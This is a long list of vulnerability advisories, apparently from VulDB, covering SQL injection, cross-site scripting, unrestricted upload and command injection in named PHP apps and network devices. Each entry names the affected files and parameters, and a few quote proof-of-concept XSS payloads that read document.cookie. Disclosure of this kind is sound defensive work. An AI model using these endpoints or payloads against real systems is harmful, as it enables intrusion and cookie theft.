A vulnerability has been found in SourceCodester Stock Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267457 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /protocol/firewall/deletemacbind.php. The manipulation of the argument messagecontent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267456. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Netentsec NS-ASG Application Security Gateway 6.3. This issue affects some unknown processing of the file /protocol/iscuser/deleteiscuser.php. The manipulation of the argument messagecontent leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267455. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in LabVantage LIMS 2017. This vulnerability affects unknown code of the file /labvantage/rc?command=page&amp;page=SampleList&amp;_iframename=list of the component POST Request Handler. The manipulation of the argument param1 leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-267454 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Likeshop up to 2.5.7 and classified as problematic. This issue affects some unknown processing of the file /admin of the component Merchandise Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-267449 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/modules/product/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-267414 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. Affected is an unknown function of the file /members/poster.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267408.
A vulnerability was found in itsourcecode Online Discussion Forum 1.0. It has been rated as critical. This issue affects some unknown processing of the file register_me.php. The manipulation of the argument eaddress leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267407.
A vulnerability was found in Clash up to 0.20.1 on Windows. It has been declared as critical. This vulnerability affects unknown code of the component Proxy Port. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-267406 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Chanjet Smooth T+system 3.5. This issue affects some unknown processing of the file /tplus/UFAQD/keyEdit.aspx. The manipulation of the argument KeyID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file report/index.php. The manipulation of the argument procduct leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267092.
A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument txtsearch leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267091.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. This vulnerability affects unknown code of the file /protocol/iscuser/uploadiscuser.php of the component JSON Content Handler. The manipulation of the argument messagecontent leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266848. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /admin/config_MT.php?action=delete. The manipulation of the argument Mid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in itsourcecode Learning Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file processscore.php. The manipulation of the argument LessonID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266839.
A vulnerability was found in Casdoor up to 1.335.0. It has been classified as problematic. Affected is an unknown function of the file /conf/app.conf of the component Configuration File Handler. The manipulation leads to files or directories accessible. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266838 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in ItsourceCode Learning Management System Project In PHP 1.0. This vulnerability affects unknown code of the file login.php. The manipulation of the argument user_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266590 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. This affects an unknown part of the file change_profile_picture.php. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266589 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file changepwd.php. The manipulation of the argument useremail leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266588.
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file massage.php. The manipulation of the argument bid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266587.
A vulnerability was found in SourceCodester Stock Management System 1.0. It has been classified as critical. Affected is an unknown function of the file createBrand.php. The manipulation of the argument brandName leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266586 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in itsourcecode Online Student Enrollment System 1.0. Affected by this vulnerability is an unknown functionality of the file instructorSubjects.php. The manipulation of the argument instructorId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266311.
A vulnerability classified as critical has been found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file newfaculty.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266310 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file listofinstructor.php. The manipulation of the argument FullName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266309 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file newDept.php. The manipulation of the argument deptname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266308.
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been classified as critical. This affects an unknown part of the file listofcourse.php. The manipulation of the argument idno leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266307.
A vulnerability was found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file editSubject.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266306 is the identifier assigned to this vulnerability.
A vulnerability has been found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file listofsubject.php. The manipulation of the argument subjcode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266305 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file listofstudent.php. The manipulation of the argument lname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266304.
A vulnerability, which was classified as problematic, has been found in oretnom23 Online Car Wash Booking System 1.0. This issue affects some unknown processing of the file /admin/?page=user/list. The manipulation of the argument First Name/Last Name with the input &lt;script&gt;confirm (document.cookie)&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-266303.
A vulnerability classified as critical was found in SourceCodester Facebook News Feed Like 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument page leads to sql injection. The attack can be initiated remotely. VDB-266302 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in lakernote EasyAdmin up to 20240324. This affects an unknown part of the file /sys/file/upload. The manipulation of the argument file leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 9c8a836ace17a93c45e5ad52a2340788b7795030. It is recommended to apply a patch to fix this issue. The identifier VDB-266301 was assigned to this vulnerability.
A vulnerability classified as critical was found in itsourcecode Student Information Management System 1.0. Affected by this vulnerability is an unknown functionality of the file view.php. The manipulation of the argument studentId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266293 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in jsy-1 short-url 1.0.0. Affected is an unknown function of the file admin.php. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is 35c790897d6979392bc6f60707fc32da13a98b63. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-266292.
A vulnerability was found in JFinalCMS up to 20240111. It has been rated as problematic. This issue affects some unknown processing of the file /admin/template. The manipulation of the argument directory leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266291.
A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage_sy.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266290 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Vehicle Management System 1.0. It has been classified as critical. This affects an unknown part of the file /newvehicle.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266289 was assigned to this vulnerability.
A vulnerability was found in Kashipara College Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file view_each_faculty.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266288.
A vulnerability has been found in Kashipara College Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file submit_student.php. The manipulation of the argument address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266287.
A vulnerability, which was classified as problematic, was found in Kashipara College Management System 1.0. Affected is an unknown function of the file submit_new_faculty.php. The manipulation of the argument address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266286 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Kashipara College Management System 1.0. This issue affects some unknown processing of the file submit_login.php. The manipulation of the argument usertype leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266285 was assigned to this vulnerability.
A vulnerability classified as problematic was found in Kashipara College Management System 1.0. This vulnerability affects unknown code of the file submit_extracurricular_activity.php. The manipulation of the argument activity_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266284.
A vulnerability classified as problematic has been found in Kashipara College Management System 1.0. This affects an unknown part of the file submit_enroll_student.php. The manipulation of the argument class_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266283.
A vulnerability was found in Kashipara College Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file submit_enroll_staff.php. The manipulation of the argument class_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266282 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara College Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file submit_admin.php. The manipulation of the argument admin_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266281 was assigned to this vulnerability.
A vulnerability was found in Kashipara College Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file delete_faculty.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266280.
A vulnerability was found in Kashipara College Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file each_extracurricula_activities.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266279.
A vulnerability has been found in SourceCodester Best House Rental Management System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file edit-cate.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266278 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Best House Rental Management System up to 1.0. This affects an unknown part of the file manage_payment.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266277 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Best House Rental Management System up to 1.0. Affected by this issue is some unknown functionality of the file manage_tenant.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266276.
A vulnerability classified as critical was found in SourceCodester Best House Rental Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266275.
A vulnerability classified as critical has been found in SourceCodester Online Hospital Management System 1.0. Affected is an unknown function of the file departmentDoctor.php. The manipulation of the argument deptid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266274 is the identifier assigned to this vulnerability.
A vulnerability was found in PHPGurukul Zoo Management System 2.1. It has been rated as critical. This issue affects some unknown processing of the file /admin/normal-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266273 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Zoo Management System 2.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/foreigner-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266272.
A vulnerability was found in PHPGurukul Zoo Management System 2.1. It has been classified as critical. This affects an unknown part of the file /admin/foreigner-search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266271.
A vulnerability was found in PHPGurukul Zoo Management System 2.1 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/normal-search.php. The manipulation of the argument searchdata leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266270 is the identifier assigned to this vulnerability.
A vulnerability has been found in PHPGurukul Zoo Management System 2.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266269 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in anji-plus AJ-Report up to 1.4.1. Affected is an unknown function of the file /dataSet/testTransform;swagger-ui. The manipulation of the argument dynSentence leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266268.
A vulnerability classified as problematic was found in anji-plus AJ-Report up to 1.4.1. This vulnerability affects unknown code of the file /reportShare/detailByCode. The manipulation of the argument shareToken leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266266 is the identifier assigned to this vulnerability.
A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/vpn/autovpn/sub_commit.php. The manipulation of the argument key leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/vpn/autovpn/online_check.php. The manipulation of the argument peernode leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been classified as critical. Affected is an unknown function of the file /view/vpn/autovpn/online.php. The manipulation of the argument peernode leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240516 and classified as critical. This issue affects some unknown processing of the file /view/systemConfig/sys_user/user_commit.php. The manipulation of the argument email2/user_name leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266243. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in JFinalCMS up to 20221020. This affects an unknown part of the file /admin/content. The manipulation of the argument Title leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266121 was assigned to this vulnerability.
A vulnerability was found in Qiwen Netdisk up to 1.4.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component File Rename Handler. The manipulation with the input &lt;img src="" onerror="alert(document.cookie)"&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266083.
A vulnerability was found in Huashi Private Cloud CDN Live Streaming Acceleration Server up to 20240520. It has been classified as critical. Affected is an unknown function of the file /manager/ipconfig_new.php. The manipulation of the argument dev leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265992.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /view/unread_msg.php. The manipulation of the argument my_index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265991.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/timetable_update_form.php. The manipulation of the argument grade leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-265990 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/timetable_insert_form.php. The manipulation of the argument grade leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265989 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Complete Web-Based School Management System 1.0. Affected by this issue is some unknown functionality of the file /view/timetable_grade_wise.php. The manipulation of the argument grade leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265988.
A vulnerability classified as critical was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/teacher_salary_invoice1.php. The manipulation of the argument date leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265987.
A vulnerability classified as critical has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/teacher_salary_invoice.php. The manipulation of the argument teacher_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-265986 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /view/teacher_salary_history1.php. The manipulation of the argument index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265985 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /view/teacher_salary_details3.php. The manipulation of the argument index leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265984.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. This affects an unknown part of the file /view/teacher_salary_details2.php. The manipulation of the argument index leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265983.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /view/teacher_salary_details.php. The manipulation of the argument index leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265982 is the identifier assigned to this vulnerability.
A vulnerability has been found in EnvaySoft FleetCart up to 4.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument razorpayKeyId leads to information disclosure. The attack can be launched remotely. It is recommended to upgrade the affected component. The identifier VDB-265981 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Arris VAP2500 08.50. This affects an unknown part of the file /tools_command.php. The manipulation of the argument cmb_header/txt_command leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265833 was assigned to this vulnerability.
A vulnerability was found in Arris VAP2500 08.50. It has been rated as critical. Affected by this issue is some unknown functionality of the file /diag_s.php. The manipulation of the argument customer_info leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265832.
A vulnerability was found in Arris VAP2500 08.50. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assoc_table.php. The manipulation of the argument id leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265831.
A vulnerability was found in Ritlabs TinyWeb Server 1.94. It has been classified as problematic. Affected is an unknown function of the component Request Handler. The manipulation with the input %0D%0A leads to crlf injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-265830 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Vehicle Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file /newdriver.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265289 was assigned to this vulnerability.
A vulnerability classified as problematic was found in PHPGurukul Directory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin-profile.php of the component Searchbar. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265213 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in PHPGurukul Directory Management System 1.0. Affected is an unknown function of the file /admin/search-directory.php.. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265212.
A vulnerability was found in PHPGurukul Directory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265211.
A vulnerability was found in SourceCodester Electricity Consumption Monitoring Tool 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-bill.php. The manipulation of the argument bill leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-265210 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Event Registration System 1.0. This affects an unknown part of the file /registrar/. The manipulation of the argument searchbar leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265203.
A vulnerability was found in SourceCodester Event Registration System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /registrar/. The manipulation of the argument search leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265202 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Event Registration System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /registrar/?page=registration. The manipulation of the argument e leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265201 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Event Registration System 1.0. It has been classified as critical. Affected is an unknown function of the file /registrar/?page=registration. The manipulation of the argument e leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265200.
A vulnerability was found in SourceCodester Event Registration System 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php?f=load_registration. The manipulation of the argument last_id/event_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265199.
A vulnerability has been found in SourceCodester Event Registration System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-265198 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. This affects an unknown part of the file portal.php. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265197 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Examination System 1.0. Affected by this issue is some unknown functionality of the file save.php. The manipulation of the argument vote leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265196.
A vulnerability classified as critical was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/teacher_profile.php. The manipulation of the argument index leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265105 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/teacher_attendance_history1.php. The manipulation of the argument index leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265104.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /view/student_profile1.php. The manipulation of the argument std_index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265103.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /view/student_profile.php. The manipulation of the argument std_index leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-265102 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. This affects an unknown part of the file /view/student_payment_invoice1.php. The manipulation of the argument date leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265101 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /view/student_payment_invoice.php. The manipulation of the argument index leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265100.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_payment_history.php. The manipulation of the argument index leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265099.
A vulnerability, which was classified as critical, was found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/student_payment_details4.php. The manipulation of the argument index leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-265098 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/student_payment_details2.php. The manipulation of the argument index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265097 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file /view/student_payment_details3.php. The manipulation of the argument index leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265096.
A vulnerability classified as critical has been found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/student_payment_details.php. The manipulation of the argument index leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265095.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/student_grade_wise.php. The manipulation of the argument grade leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265094 is the identifier assigned to this vulnerability.
